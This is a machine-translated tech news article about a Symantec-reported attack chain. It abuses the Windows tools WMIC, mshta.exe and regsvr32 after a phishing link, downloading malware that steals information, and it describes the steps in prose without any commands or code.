Hackers abuse legitimate Windows tools to steal information

Get a free Techzine subscription!

Attackers increasingly use legitimate tools or run simple scripts and shell code directly in memory. These living off the land tactics are less likely to be detected by traditional malware protection, Symantec warns.

By carrying out an attack using software and processes that are already present on a targeted computer, a hacker can do his job unnoticed for a longer period of time. This is because (almost) no new unknown files are introduced to the system, which minimizes the risk of detection.

A new attack uncovered by Symantec uses the legitimate WMIC tool in Windows (Windows Management Instrumentation Command-line) in combination with an eXtensible Stylesheet Language (XSL) file to download malware onto a system and then steal information.

WMIC is a legitimate utility that is present on all Windows machines. It is used for management tasks on both local and remote systems and can be used to retrieve system settings, manage control processes and execute scripts.

The use of WMI by cybercriminals is not new. The tool is usually used for propagation, but in this case it is used to download a malicious file, say the Symantec researchers.

The attack

The attack starts with a phishing attempt where the victim is tricked into clicking on an url. Once clicked, a WMIC command is executed that downloads a malicious XSL file to the system. The file contains a JavaScript that is executed via mshta.exe, a legitimate Windows process used to execute the Microsoft HTML Application Host.

Up to this point, in principle, no suspicious cases have occurred on the system in question. However, JavaScript is not so innocent. It contains a list of 52 domains that generates a random download link to download an HTML Application (HTA) file.

The HTA file then generates new dynamic urls in a similar way to download more files, including three DLLs. These are registered using the legitimate regsvr32.exe, as well as the main payload.

The payload contains several modules for stealing information from the affected system. The HTA file can be used to install additional modules, including a password stealing tool, a keylogger, backdoor, and so on.

This news article was automatically translated from Dutch to give Techzine.eu a head start. All news articles after September 1, 2019 are written in native English and NOT translated. All our background stories are written in native English as well. For more information read our launch article.